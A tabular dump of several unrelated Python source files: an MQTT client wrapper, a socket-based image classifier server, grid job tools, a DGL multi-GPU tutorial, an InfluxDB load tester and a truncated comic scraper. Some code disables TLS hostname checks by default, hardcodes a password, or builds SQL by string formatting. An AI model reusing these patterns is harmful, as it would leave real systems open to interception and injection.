source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
communication.py
|
import logging
import time
import json
import threading
from collections import namedtuple
import paho.mqtt.client as mqtt
class Communication:
def __init__(self, config):
self._logger = logging.getLogger(self.__class__.__name__)
self._config = config
self.client = mqtt.Client()
self.client.on_message = self._on_message_cb
self.client.on_connect = self._on_connect_cb
self._subscriptions = set()
self._will = None
self._thread = None
self._lock = threading.Lock()
if config.getboolean("ssl"):
self.client.tls_set(self._config["ca_certs"], self._config["certfile"], self._config["keyfile"])
if self._config.getboolean("unsafe_hostname", True):
self.client.tls_insecure_set(True)
if self._config.get("username"):
self.client.username_pw_set(self._config["username"], password=self._config.get("password", None))
def connect_async(self):
with self._lock:
if not self._thread:
self._thread = threading.Thread(target=self._connect)
self._thread.setDaemon(True)
self._thread.start()
def _connect(self):
self.client.connect(host=self._config["hostname"], port=self._config.getint("port"))
while True:
try:
self.client.loop_forever()
except Exception as e:
self._logger.error("MQTT connection broken, reconnecting")
self._logger.error(e)
def _on_message_cb(self, client, userdata, msg):
# pass on to every callback fitting
for topic, func in self._subscriptions:
if self.is_subscription(topic, msg.topic):
func(client, userdata, msg)
def _on_connect_cb(self, client, userdata, flags, rc):
# resubscribe to all topics when reconnecting
for topic, func in self._subscriptions:
self.client.subscribe(topic)
# set last will
if self.will:
self.client.will_set(*self.will)
def publish(self, topic, message, qos=0, retain=False):
"""
Publish a message to the topic.
:param str topic:
:param message: dict-like object or string, must be json serializable
:param int qos: quality of service for message
:param bool retain: retain messages on broker
"""
self._logger.debug("Publishing topic: %s message: %s qos: %s retain: %s", topic, message, qos, retain)
try:
# received a dict-like object
message["timestamp"] = time.time()
except TypeError:
# we got a string or something
message = {"message": message, "timestamp": time.time()}
self._logger.debug("Message formatted to %s", message)
self.client.publish(topic=topic, payload=json.dumps(message), qos=qos, retain=retain)
def register_callback(self, topic, callback):
cb_tuple = (topic, callback)
if cb_tuple not in self._subscriptions:
self._subscriptions.add(cb_tuple)
self.client.subscribe(topic)
@property
def will(self):
return self._will
@will.setter
def will(self, value):
"""
Set value as our will
:param value: Tuple[str, str, int, bool] where [topic, payload, qos, retain]
"""
self._will = value
self.client.will_set(*value)
@staticmethod
def is_subscription(sub, msg):
sub = sub.split("/")
msg = msg.split("/")
# if the subscription topic is longer than the actual message topic, it ain't never gonna work
if len(sub) > len(msg):
return False
for i, part in enumerate(msg):
# catch all wildcard
if sub[i] == "#":
return True
# one level wildcard or exact match
elif sub[i] == "+" or sub[i] == part:
continue
else:
return False
return True
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
import numpy as np
import os
import argparse
import config
import util
from sklearn.externals import joblib
import traceback
from keras.applications.imagenet_utils import preprocess_input
import time
util.set_img_format()
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True, help='Base model architecture',
choices=[config.MODEL_RESNET50,
config.MODEL_RESNET152,
config.MODEL_INCEPTION_V3,
config.MODEL_VGG16])
args = parser.parse_args()
config.model = args.model
model_module = util.get_model_class_instance()
model = model_module.load()
print('Model loaded')
print('Warming up the model')
start = time.clock()
if util.get_keras_backend_name() != 'tensorflow':
input_shape = (1, 3,) + model_module.img_size
else:
input_shape = (1, ) + model_module.img_size + (3, )
dummpy_img = np.ones(input_shape)
dummpy_img = preprocess_input(dummpy_img)
model.predict(dummpy_img)
end = time.clock()
print('Warming up took {} s'.format(end - start))
print('Trying to load a Novelty Detector')
try:
af = util.get_activation_function(model, model_module.noveltyDetectionLayerName)
print('Activation function is loaded')
novelty_detection_clf = joblib.load(config.get_novelty_detection_model_path())
print('Novelty Detection classifier is loaded')
except Exception as e:
print('Error on loading Novelty Detection classifier', e)
FILE_DOES_NOT_EXIST = '-1'
UNKNOWN_ERROR = '-2'
def handle(clientsocket):
while 1:
buf = clientsocket.recv(config.buffer_size)
if buf == 'exit'.encode():
return # client terminated connection
response = ''
if os.path.isfile(buf):
try:
img = [model_module.load_img(buf)]
out = model.predict(np.array(img))
prediction = np.argmax(out)
top10 = out[0].argsort()[-10:][::-1]
class_indices = dict(zip(config.classes, range(len(config.classes))))
keys = list(class_indices.keys())
values = list(class_indices.values())
answer = keys[values.index(prediction)]
try:
acts = util.get_activations(af, img)
predicted_relativity = novelty_detection_clf.predict(acts)[0]
nd_class = novelty_detection_clf.__classes[predicted_relativity]
except Exception as e:
print(e.message)
nd_class = 'related'
top10_json = "["
for i, t in enumerate(top10):
top10_json += '{"probability":"%s", "class":"%s"}%s' % (
out[0][t], keys[values.index(t)], '' if i == 9 else ',')
top10_json += "]"
response = '{"probability":"%s","class":"%s","relativity":"%s","top10":%s}' % (
out[0][prediction], answer, nd_class, top10_json)
print(response)
except Exception as e:
print('Error', e)
traceback.print_stack()
response = UNKNOWN_ERROR
else:
response = FILE_DOES_NOT_EXIST
clientsocket.sendall(response.encode())
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(config.server_address)
serversocket.listen(10000)
print('Ready for requests')
while 1:
# accept connections from outside
(clientsocket, address) = serversocket.accept()
ct = Thread(target=handle, args=(clientsocket,))
ct.run()
|
grid.py
|
"""
Codes to submit multiple jobs to JCVI grid engine
"""
import os.path as op
import sys
import re
import logging
from multiprocessing import Pool, Process, Queue, cpu_count
from jcvi.formats.base import write_file, must_open
from jcvi.apps.base import OptionParser, ActionDispatcher, popen, backup, \
mkdir, sh, listify
class Parallel(object):
"""
Run a number of commands in parallel.
"""
def __init__(self, cmds, cpus=cpu_count()):
self.cmds = cmds
self.cpus = min(len(cmds), cpus)
def run(self):
p = Pool(processes=self.cpus)
p.map(sh, self.cmds)
class Dependency (object):
"""
Used by MakeManager.
"""
def __init__(self, source, target, cmds, id, remove=False):
self.id = id
self.source = listify(source)
self.target = listify(target)
self.cmds = listify(cmds)
if remove:
rm_cmd = "rm -f {0}".format(" ".join(self.target))
self.cmds = [rm_cmd] + self.cmds
def __str__(self):
source = " ".join(self.source)
target = " ".join(self.target)
# When there are multiple targets, use .INTERMEDIATE
# <http://stackoverflow.com/questions/2973445/gnu-makefile-rule-generating-a-few-targets-from-a-single-source-file>
if len(self.target) > 1:
intermediate = "{0}.intermediate".format(self.id)
s = "{0} : {1}\n".format(target, intermediate)
s += ".INTERMEDIATE: {0}\n".format(intermediate)
s += "{0} : {1}\n".format(intermediate, source)
else:
s = "{0} : {1}\n".format(target, source)
for c in self.cmds:
c = c.replace("$", "$$") # Command escaping
s += "\t" + c + "\n"
return s
class MakeManager (list):
"""
Write and execute makefile.
"""
def __init__(self, filename="makefile"):
self.makefile = filename
self.targets = set()
self.ndeps = 0
def add(self, source, target, cmds, remove=False):
self.ndeps += 1
d = Dependency(source, target, cmds, self.ndeps, remove=remove)
self.append(d)
self.targets |= set(listify(target))
def write(self):
assert self.targets, "No targets specified"
filename = self.makefile
if op.exists(filename):
backup(filename)
fw = open(filename, "w")
print >> fw, "all : {0}\n".format(" ".join(sorted(self.targets)))
for d in self:
print >> fw, d
print >> fw, "clean :\n\trm -rf {0}\n".format(" ".join(self.targets))
fw.close()
logging.debug("Makefile written to `{0}`.".format(self.makefile))
def run(self, cpus=1):
if not op.exists(self.makefile):
self.write()
cmd = "make -j {0} -f {1}".format(cpus, self.makefile)
sh(cmd)
def clean(self):
cmd = "make clean -f {}".format(self.makefile)
sh(cmd)
class Jobs (list):
"""
Runs multiple funcion calls on the SAME computer, using multiprocessing.
"""
def __init__(self, target, args):
for x in args:
x = listify(x)
self.append(Process(target=target, args=x))
def start(self):
for pi in self:
pi.start()
def join(self):
for pi in self:
pi.join()
def run(self):
self.start()
self.join()
class Poison:
pass
class WriteJobs (object):
"""
Runs multiple function calls, but write to the same file.
Producer-consumer model.
"""
def __init__(self, target, args, filename, cpus=cpu_count()):
workerq = Queue()
writerq = Queue()
for a in args:
workerq.put(a)
cpus = min(cpus, len(args))
for i in xrange(cpus):
workerq.put(Poison())
self.worker = Jobs(work, args=[(workerq, writerq, target)] * cpus)
self.writer = Process(target=write, args=(workerq, writerq, \
filename, cpus))
def run(self):
self.worker.start()
self.writer.start()
self.worker.join()
self.writer.join()
def work(queue_in, queue_out, target):
while True:
a = queue_in.get()
if isinstance(a, Poison):
break
res = target(a)
queue_out.put(res)
queue_out.put(Poison())
def write(queue_in, queue_out, filename, cpus):
from jcvi.utils.progressbar import ProgressBar, Percentage, Bar, ETA
fw = must_open(filename, "w")
isize = queue_in.qsize()
logging.debug("A total of {0} items to compute.".format(isize))
isize = isize or 1
widgets = ['Queue: ', Percentage(), ' ',
Bar(marker='>', left='[', right=']'), ' ', ETA()]
p = ProgressBar(maxval=isize, term_width=60, widgets=widgets).start()
poisons = 0
while True:
res = queue_out.get()
qsize = queue_in.qsize()
p.update(isize - qsize)
if isinstance(res, Poison):
poisons += 1
if poisons == cpus: # wait all workers finish
break
elif res:
print >> fw, res
fw.flush()
fw.close()
class GridOpts (dict):
def __init__(self, opts):
export = ("pcode", "queue", "threaded", "concurrency",
"outdir", "name", "hold_jid")
for e in export:
if e in opts.__dict__:
self[e] = getattr(opts, e)
class GridProcess (object):
pat1 = re.compile(r"Your job (?P<id>[0-9]*) ")
pat2 = re.compile(r"Your job-array (?P<id>\S*) ")
def __init__(self, cmd, jobid="", pcode="99999", queue="default", threaded=None,
infile=None, outfile=None, errfile=None, arr=None,
concurrency=None, outdir=".", name=None, hold_jid=None,
grid_opts=None):
self.cmd = cmd
self.jobid = jobid
self.queue = queue
self.threaded = threaded
self.infile = infile
self.outfile = outfile or ""
self.errfile = errfile or ""
self.arr = arr
self.concurrency = concurrency
self.outdir = outdir
self.name = name
self.pcode = pcode
self.hold_jid = hold_jid
self.pat = self.pat2 if arr else self.pat1
if grid_opts:
self.__dict__.update(GridOpts(grid_opts))
def __str__(self):
return "\t".join((x for x in \
(self.jobid, self.cmd, self.outfile) if x))
def build(self):
# Shell commands
if "|" in self.cmd or "&&" in self.cmd or "||" in self.cmd:
quote = "\"" if "'" in self.cmd else "'"
self.cmd = "sh -c {1}{0}{1}".format(self.cmd, quote)
# qsub command (the project code is specific to jcvi)
qsub = "qsub -P {0} -cwd".format(self.pcode)
if self.queue != "default":
qsub += " -l {0}".format(self.queue)
if self.threaded:
qsub += " -pe threaded {0}".format(self.threaded)
if self.arr:
assert 1 <= self.arr < 100000
qsub += " -t 1-{0}".format(self.arr)
if self.concurrency:
qsub += " -tc {0}".format(self.concurrency)
if self.name:
qsub += ' -N "{0}"'.format(self.name)
if self.hold_jid:
param = "-hold_jid_ad" if self.arr else "-hold_jid"
qsub += " {0} {1}".format(param, self.hold_jid)
# I/O
infile = self.infile
outfile = self.outfile
errfile = self.errfile
outdir = self.outdir
mkdir(outdir)
redirect_same = outfile and (outfile == errfile)
if infile:
qsub += " -i {0}".format(infile)
if outfile:
self.outfile = op.join(outdir, outfile)
qsub += " -o {0}".format(self.outfile)
if errfile:
if redirect_same:
qsub += " -j y"
else:
self.errfile = op.join(outdir, errfile)
qsub += " -e {0}".format(self.errfile)
cmd = " ".join((qsub, self.cmd))
return cmd
def start(self):
cmd = self.build()
# run the command and get the job-ID (important)
output = popen(cmd, debug=False).read()
if output.strip() != "":
self.jobid = re.search(self.pat, output).group("id")
else:
self.jobid = "-1"
msg = "[{0}] {1}".format(self.jobid, self.cmd)
if self.infile:
msg += " < {0} ".format(self.infile)
if self.outfile:
backup(self.outfile)
msg += " > {0} ".format(self.outfile)
if self.errfile:
backup(self.errfile)
msg += " 2> {0} ".format(self.errfile)
logging.debug(msg)
class Grid (list):
def __init__(self, cmds, outfiles=[]):
assert cmds, "Commands empty!"
if not outfiles:
outfiles = [None] * len(cmds)
for cmd, outfile in zip(cmds, outfiles):
self.append(GridProcess(cmd, outfile=outfile))
def run(self):
for pi in self:
pi.start()
PBS_STANZA = """
#PBS -q standard
#PBS -J 1-{0}
#PBS -l select=1:ncpus={1}:mem=23gb
#PBS -l pvmem=23gb
#PBS -l walltime=100:00:00
#PBS -W group_list=genomeanalytics
"""
arraysh = """
CMD=`awk "NR==$SGE_TASK_ID" {0}`
$CMD"""
arraysh_ua = PBS_STANZA + """
cd $PBS_O_WORKDIR
CMD=`awk "NR==$PBS_ARRAY_INDEX" {2}`
$CMD"""
def get_grid_engine():
cmd = "qsub --version"
ret = popen(cmd, debug=False).read()
return "PBS" if "PBS" in ret else "SGE"
def main():
actions = (
('run', 'run a normal command on grid'),
('array', 'run an array job'),
('kill', 'wrapper around the `qdel` command'),
)
p = ActionDispatcher(actions)
p.dispatch(globals())
def array(args):
"""
%prog array commands.list
Parallelize a set of commands on grid using array jobs.
"""
p = OptionParser(array.__doc__)
p.set_grid_opts(array=True)
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
cmds, = args
fp = open(cmds)
N = sum(1 for x in fp)
fp.close()
pf = cmds.rsplit(".", 1)[0]
runfile = pf + ".sh"
assert runfile != cmds, \
"Commands list file should not have a `.sh` extension"
engine = get_grid_engine()
threaded = opts.threaded or 1
contents = arraysh.format(cmds) if engine == "SGE" \
else arraysh_ua.format(N, threaded, cmds)
write_file(runfile, contents)
if engine == "PBS":
return
outfile = "{0}.{1}.out".format(pf, "\$TASK_ID")
errfile = "{0}.{1}.err".format(pf, "\$TASK_ID")
p = GridProcess("sh {0}".format(runfile), outfile=outfile, errfile=errfile,
arr=ncmds, grid_opts=opts)
p.start()
def run(args):
"""
%prog run command ::: file1 file2
Parallelize a set of commands on grid. The syntax is modeled after GNU
parallel <http://www.gnu.org/s/parallel/man.html#options>
{} - input line
{.} - input line without extension
{_} - input line first part
{/} - basename of input line
{/.} - basename of input line without extension
{/_} - basename of input line first part
{#} - sequence number of job to run
::: - Use arguments from the command line as input source instead of stdin
(standard input).
If file name is `t/example.tar.gz`, then,
{} is "t/example.tar.gz", {.} is "t/example.tar", {_} is "t/example"
{/} is "example.tar.gz", {/.} is "example.tar", {/_} is "example"
A few examples:
ls -1 *.fastq | %prog run process {} {.}.pdf # use stdin
%prog run process {} {.}.pdf ::: *fastq # use :::
%prog run "zcat {} > {.}" ::: *.gz # quote redirection
%prog run < commands.list # run a list of commands
"""
p = OptionParser(run.__doc__)
p.set_grid_opts()
opts, args = p.parse_args(args)
if len(args) == 0:
sys.exit(not p.print_help())
sep = ":::"
if sep in args:
sepidx = args.index(sep)
filenames = args[sepidx + 1:]
args = args[:sepidx]
if not filenames:
filenames = [""]
else:
filenames = sys.stdin if not sys.stdin.isatty() else [""]
cmd = " ".join(args)
cmds = [] if filenames else [(cmd, None)]
for i, filename in enumerate(filenames):
filename = filename.strip()
noextname = filename.rsplit(".", 1)[0]
prefix, basename = op.split(filename)
basenoextname = basename.rsplit(".", 1)[0]
basefirstname = basename.split(".")[0]
firstname = op.join(prefix, basefirstname)
ncmd = cmd
if "{" in ncmd:
ncmd = ncmd.replace("{}", filename)
else:
ncmd += " " + filename
ncmd = ncmd.replace("{.}", noextname)
ncmd = ncmd.replace("{_}", firstname)
ncmd = ncmd.replace("{/}", basename)
ncmd = ncmd.replace("{/.}", basenoextname)
ncmd = ncmd.replace("{/_}", basefirstname)
ncmd = ncmd.replace("{#}", str(i))
outfile = None
if ">" in ncmd:
ncmd, outfile = ncmd.split(">", 1)
ncmd, outfile = ncmd.strip(), outfile.strip()
ncmd = ncmd.strip()
cmds.append((ncmd, outfile))
for ncmd, outfile in cmds:
p = GridProcess(ncmd, outfile=outfile, grid_opts=opts)
p.start()
def guess_method(tag):
from jcvi.formats.base import is_number
jobids = tag.split(",")
for jobid in jobids:
if not is_number(jobid):
return "pattern"
return "jobid"
def kill(args):
"""
%prog kill [options] JOBNAMEPAT/JOBIDs
Kill jobs based on JOBNAME pattern matching (case-sensitive)
or list of JOBIDs (comma separated)
Examples:
%prog kill "pyth*" # Use regex
%prog kill 160253,160245,160252 # Use list of job ids
%prog kill all # Everything
"""
import shlex
from jcvi.apps.base import sh, getusername
from subprocess import check_output, CalledProcessError
import xml.etree.ElementTree as ET
valid_methods = ("pattern", "jobid")
p = OptionParser(kill.__doc__)
p.add_option("--method", choices=valid_methods,
help="Identify jobs based on [default: guess]")
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
username = getusername()
tag, = args
tag = tag.strip()
if tag == "all":
sh("qdel -u {0}".format(username))
return
valid_jobids = set()
method = opts.method or guess_method(tag)
if method == "jobid":
jobids = tag.split(",")
valid_jobids |= set(jobids)
elif method == "pattern":
qsxmlcmd = 'qstat -u "{0}" -j "{1}" -nenv -njd -xml'.\
format(username, tag)
try:
qsxml = check_output(shlex.split(qsxmlcmd)).strip()
except CalledProcessError, e:
qsxml = None
logging.debug('No jobs matching the pattern "{0}"'.format(tag))
if qsxml is not None:
for job in ET.fromstring(qsxml).findall("djob_info"):
for elem in job.findall("element"):
jobid = elem.find("JB_job_number").text
valid_jobids.add(jobid)
if valid_jobids:
sh("qdel {0}".format(",".join(valid_jobids)))
if __name__ == '__main__':
main()
|
2_node_classification.py
|
"""
Single Machine Multi-GPU Minibatch Node Classification
======================================================
In this tutorial, you will learn how to use multiple GPUs in training a
graph neural network (GNN) for node classification.
(Time estimate: 8 minutes)
This tutorial assumes that you have read the :doc:`Training GNN with Neighbor
Sampling for Node Classification <../large/L1_large_node_classification>`
tutorial. It also assumes that you know the basics of training general
models with multi-GPU with ``DistributedDataParallel``.
.. note::
See `this tutorial <https://pytorch.org/tutorials/intermediate/ddp_tutorial.html>`__
from PyTorch for general multi-GPU training with ``DistributedDataParallel``. Also,
see the first section of :doc:`the multi-GPU graph classification
tutorial <1_graph_classification>`
for an overview of using ``DistributedDataParallel`` with DGL.
"""
######################################################################
# Loading Dataset
# ---------------
#
# OGB already prepared the data as a ``DGLGraph`` object. The following code is
# copy-pasted from the :doc:`Training GNN with Neighbor Sampling for Node
# Classification <../large/L1_large_node_classification>`
# tutorial.
#
import dgl
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn import SAGEConv
from ogb.nodeproppred import DglNodePropPredDataset
import tqdm
import sklearn.metrics
dataset = DglNodePropPredDataset('ogbn-arxiv')
graph, node_labels = dataset[0]
# Add reverse edges since ogbn-arxiv is unidirectional.
graph = dgl.add_reverse_edges(graph)
graph.ndata['label'] = node_labels[:, 0]
node_features = graph.ndata['feat']
num_features = node_features.shape[1]
num_classes = (node_labels.max() + 1).item()
idx_split = dataset.get_idx_split()
train_nids = idx_split['train']
valid_nids = idx_split['valid']
test_nids = idx_split['test'] # Test node IDs, not used in the tutorial though.
######################################################################
# Defining Model
# --------------
#
# The model will be again identical to the :doc:`Training GNN with Neighbor
# Sampling for Node Classification <../large/L1_large_node_classification>`
# tutorial.
#
class Model(nn.Module):
def __init__(self, in_feats, h_feats, num_classes):
super(Model, self).__init__()
self.conv1 = SAGEConv(in_feats, h_feats, aggregator_type='mean')
self.conv2 = SAGEConv(h_feats, num_classes, aggregator_type='mean')
self.h_feats = h_feats
def forward(self, mfgs, x):
h_dst = x[:mfgs[0].num_dst_nodes()]
h = self.conv1(mfgs[0], (x, h_dst))
h = F.relu(h)
h_dst = h[:mfgs[1].num_dst_nodes()]
h = self.conv2(mfgs[1], (h, h_dst))
return h
######################################################################
# Defining Training Procedure
# ---------------------------
#
# The training procedure will be slightly different from what you saw
# previously, in the sense that you will need to
#
# * Initialize a distributed training context with ``torch.distributed``.
# * Wrap your model with ``torch.nn.parallel.DistributedDataParallel``.
# * Add a ``use_ddp=True`` argument to the DGL dataloader you wish to run
# together with DDP.
#
# You will also need to wrap the training loop inside a function so that
# you can spawn subprocesses to run it.
#
def run(proc_id, devices):
# Initialize distributed training context.
dev_id = devices[proc_id]
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(master_ip='127.0.0.1', master_port='12345')
if torch.cuda.device_count() < 1:
device = torch.device('cpu')
torch.distributed.init_process_group(
backend='gloo', init_method=dist_init_method, world_size=len(devices), rank=proc_id)
else:
torch.cuda.set_device(dev_id)
device = torch.device('cuda:' + str(dev_id))
torch.distributed.init_process_group(
backend='nccl', init_method=dist_init_method, world_size=len(devices), rank=proc_id)
# Define training and validation dataloader, copied from the previous tutorial
# but with one line of difference: use_ddp to enable distributed data parallel
# data loading.
sampler = dgl.dataloading.MultiLayerNeighborSampler([4, 4])
train_dataloader = dgl.dataloading.NodeDataLoader(
# The following arguments are specific to NodeDataLoader.
graph, # The graph
train_nids, # The node IDs to iterate over in minibatches
sampler, # The neighbor sampler
device=device, # Put the sampled MFGs on CPU or GPU
use_ddp=True, # Make it work with distributed data parallel
# The following arguments are inherited from PyTorch DataLoader.
batch_size=1024, # Per-device batch size.
# The effective batch size is this number times the number of GPUs.
shuffle=True, # Whether to shuffle the nodes for every epoch
drop_last=False, # Whether to drop the last incomplete batch
num_workers=0 # Number of sampler processes
)
valid_dataloader = dgl.dataloading.NodeDataLoader(
graph, valid_nids, sampler,
device=device,
use_ddp=False,
batch_size=1024,
shuffle=False,
drop_last=False,
num_workers=0,
)
model = Model(num_features, 128, num_classes).to(device)
# Wrap the model with distributed data parallel module.
if device == torch.device('cpu'):
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=None, output_device=None)
else:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[device], output_device=device)
# Define optimizer
opt = torch.optim.Adam(model.parameters())
best_accuracy = 0
best_model_path = './model.pt'
# Copied from previous tutorial with changes highlighted.
for epoch in range(10):
model.train()
with tqdm.tqdm(train_dataloader) as tq:
for step, (input_nodes, output_nodes, mfgs) in enumerate(tq):
# feature copy from CPU to GPU takes place here
inputs = mfgs[0].srcdata['feat']
labels = mfgs[-1].dstdata['label']
predictions = model(mfgs, inputs)
loss = F.cross_entropy(predictions, labels)
opt.zero_grad()
loss.backward()
opt.step()
accuracy = sklearn.metrics.accuracy_score(labels.cpu().numpy(), predictions.argmax(1).detach().cpu().numpy())
tq.set_postfix({'loss': '%.03f' % loss.item(), 'acc': '%.03f' % accuracy}, refresh=False)
model.eval()
# Evaluate on only the first GPU.
if proc_id == 0:
predictions = []
labels = []
with tqdm.tqdm(valid_dataloader) as tq, torch.no_grad():
for input_nodes, output_nodes, mfgs in tq:
inputs = mfgs[0].srcdata['feat']
labels.append(mfgs[-1].dstdata['label'].cpu().numpy())
predictions.append(model(mfgs, inputs).argmax(1).cpu().numpy())
predictions = np.concatenate(predictions)
labels = np.concatenate(labels)
accuracy = sklearn.metrics.accuracy_score(labels, predictions)
print('Epoch {} Validation Accuracy {}'.format(epoch, accuracy))
if best_accuracy < accuracy:
best_accuracy = accuracy
torch.save(model.state_dict(), best_model_path)
# Note that this tutorial does not train the whole model to the end.
break
######################################################################
# Spawning Trainer Processes
# --------------------------
#
# A typical scenario for multi-GPU training with DDP is to replicate the
# model once per GPU, and spawn one trainer process per GPU.
#
# PyTorch tutorials recommend using ``multiprocessing.spawn`` to spawn
# multiple processes. This however is undesirable for training node
# classification or link prediction models on a single large graph,
# especially on Linux. The reason is that a single large graph itself may
# take a lot of memory, and ``mp.spawn`` will duplicate all objects in the
# program, including the large graph. Consequently, the large graph will
# be duplicated as many times as the number of GPUs.
#
# To alleviate the problem we recommend using ``multiprocessing.Process``,
# which *forks* from the main process and allows sharing the same graph
# object to trainer processes via *copy-on-write*. This can greatly reduce
# the memory consumption.
#
# Normally, DGL maintains only one sparse matrix representation (usually COO)
# for each graph, and will create new formats when some APIs are called for
# efficiency. For instance, calling ``in_degrees`` will create a CSC
# representation for the graph, and calling ``out_degrees`` will create a
# CSR representation. A consequence is that if a graph is shared to
# trainer processes via copy-on-write *before* having its CSC/CSR
# created, each trainer will create its own CSC/CSR replica once ``in_degrees``
# or ``out_degrees`` is called. To avoid this, you need to create
# all sparse matrix representations beforehand using the ``create_formats_``
# method:
#
graph.create_formats_()
######################################################################
# Then you can spawn the subprocesses to train with multiple GPUs.
#
# .. note::
#
# You will need to use ``dgl.multiprocessing`` instead of the Python
# ``multiprocessing`` package. ``dgl.multiprocessing`` is identical to
# Python’s built-in ``multiprocessing`` except that it handles the
# subtleties between forking and multithreading in Python.
#
# Say you have four GPUs.
num_gpus = 4
import dgl.multiprocessing as mp
devices = list(range(num_gpus))
procs = []
for proc_id in range(num_gpus):
p = mp.Process(target=run, args=(proc_id, devices))
p.start()
procs.append(p)
for p in procs:
p.join()
# Thumbnail credits: Stanford CS224W Notes
# sphinx_gallery_thumbnail_path = '_static/blitz_1_introduction.png'
|
influx_query_load.py
|
import simplejson as json
import pycurl, sys, time, multiprocessing, threading
numProcesses = int(sys.argv[1])
numQueriesPerProcess = int(sys.argv[2])
series = sys.argv[3]
url = sys.argv[4]
print numProcesses * numQueriesPerProcess
data = "q=select value from "
data += series
print data
def processWorker(numQueriesPerProcess):
inc = 0
while inc < numQueriesPerProcess:
c = pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.CURLOPT_NOSIGNAL, 1)
c.setopt(pycurl.HTTPHEADER, ['Accept: text/plain'])
c.setopt(pycurl.POSTFIELDS, data)
c.setopt(c.VERBOSE, True)
c.setopt(pycurl.USERPWD, 'rdd-admin:password')
c.perform()
response = c.getinfo(c.RESPONSE_CODE)
if response != 200:
print response, data
print inc
inc += 1
def processStart(numProcesses,numQueriesPerProcess):
if __name__ == '__main__':
jobs = []
for i in range(numProcesses):
p = multiprocessing.Process(target=processWorker, args=(numQueriesPerProcess,))
jobs.append(p)
p.start()
processStart(numProcesses,numQueriesPerProcess)
|
main.py
|
# 一本书
import base64
import sqlite3
import threading
import time
from _md5 import md5
from queue import Queue
from random import random, randint
from urllib import parse
import pickle
import requests
from src.server import Server, req, json, config, Log
from langconv import Converter
from conf.baidu import BaiduAppId, BaiduKey
class DbBook(object):
def __init__(self):
self.id = "" # 唯一标识
self.title = "" # 标题
self.title2 = "" # 标题2
self.author = "" # 作者
self.chineseTeam = "" # 汉化组
self.description = "" # 描述
self.epsCount = 0 # 章节数
self.pages = 0 # 页数
self.finished = False # 是否完本
self.categories = "" # 分类
self.tags = "" # tag
self.likesCount = 0 # 爱心数
self.created_at = 0 # 创建时间
self.updated_at = 0 # 更新时间
self.path = "" # 路径
self.fileServer = "" # 路径
self.originalName = "" # 封面名
self.totalLikes = 0 #
self.totalViews = 0 #
class MainInfo(object):
def __init__(self):
self.url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
self.appid = BaiduAppId
self.secretKey = BaiduKey
self.fromLang = 'jp'
self.toLang = "zh"
self._inQueue = Queue()
self._resultQueue = Queue()
self.checkPage = 2
self.categoryIndex = 0
self.count = 0
self.idToCateGoryBase = []
self.thread = threading.Thread(target=self.Run)
self.thread.setDaemon(True)
self.conn = sqlite3.connect("data/book.db")
self.cur = self.conn.cursor()
self.cur.execute("select * from book")
self.books = {}
self._needUpIds = set()
self._updateIds = {}
for data in self.cur.fetchall():
info = DbBook()
info.id = data[0]
info.title = data[1]
info.title2 = data[2]
info.author = data[3]
info.chineseTeam = data[4]
info.description = data[5]
info.epsCount = data[6]
info.pages = data[7]
info.finished = data[8]
info.likesCount = data[9]
info.categories = data[10]
info.tags = data[11]
info.created_at = data[12]
info.updated_at = data[13]
info.path = data[14]
info.fileServer = data[15]
info.originalName = data[16]
info.totalLikes = data[17]
info.totalViews = data[18]
self.books[info.id] = info
def AddHistory(self, book):
assert isinstance(book, DbBook)
sql = "replace INTO book(id, title, title2, author, chineseTeam, description, epsCount, pages, finished, likesCount, categories, tags," \
"created_at, updated_at, path, fileServer, originalName, totalLikes, totalViews) " \
"VALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', {6}, {7}, {8}, {9}, '{10}', '{11}', '{12}', '{13}', '{14}', '{15}', '{16}', {17}, {18}); " \
.format(book.id, book.title, book.title2, book.author, book.chineseTeam, book.description, book.epsCount, book.pages, int(book.finished), book.likesCount,
book.categories, book.tags, book.created_at, book.updated_at, book.path, book.fileServer, book.originalName, book.totalLikes, book.totalViews)
sql = sql.replace("\0", "")
# day = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
fileName = time.strftime('%Y-%m-%d', time.localtime(time.time()))
SubVersion = int(time.time())
# sql2 = "replace INTO system(id, size, time, subversion) VALUES('{0}', {1}, '{2}', {3})".format(
# config.UpdateVersion, len(self.books), day, SubVersion
# )
try:
self.cur.execute(sql)
# self.cur.execute(sql2)
data = base64.b64encode(sql.encode("utf-8")).decode("utf-8")
info = base64.b64encode(pickle.dumps(book)).decode("utf-8")
with open("data/"+fileName+".data", "a") as f:
f.write(info + "\r\n")
with open("version.txt", "w") as f2:
f2.write(str(SubVersion))
except Exception as es:
Log.Error(es)
return
# def LoadNextPage(self, page, maxPage):
# if page >= maxPage:
# return maxPage
# print("load page: " + str(page) + "/" + str(maxPage))
# task = Server().Send(req.AdvancedSearchReq(page, [], "dd"), isASync=False)
# if hasattr(task.res, "raw"):
# return self.SendSearchBack(page, task.res.raw.text)
# return page + 1
def LoadNextPage2(self, categoryIndex, page, maxPage):
if page > maxPage or page >= self.checkPage:
categoryIndex += 1
if categoryIndex >= len(self.idToCateGoryBase):
Log.Info("end")
return categoryIndex, page+1, maxPage
else:
page = 1
maxPage = 1
title = self.idToCateGoryBase[categoryIndex]
Log.Info("load page {}: ".format(title) + str(page) + "/" + str(maxPage) + " " + str(categoryIndex) + "/" + str(len(self.idToCateGoryBase)))
task = Server().Send(req.CategoriesSearchReq(page, title, "dd"), isASync=False)
if hasattr(task.res, "raw"):
page, maxPage = self.SendSearchBack(page, maxPage, task.res.raw.text)
return categoryIndex, page+1, maxPage
def SendSearchBack(self, page, maxPage, raw):
try:
data = json.loads(raw)
if data.get("code") == 200:
info = data.get("data").get("comics")
page = int(info.get("page"))
pages = int(info.get("pages"))
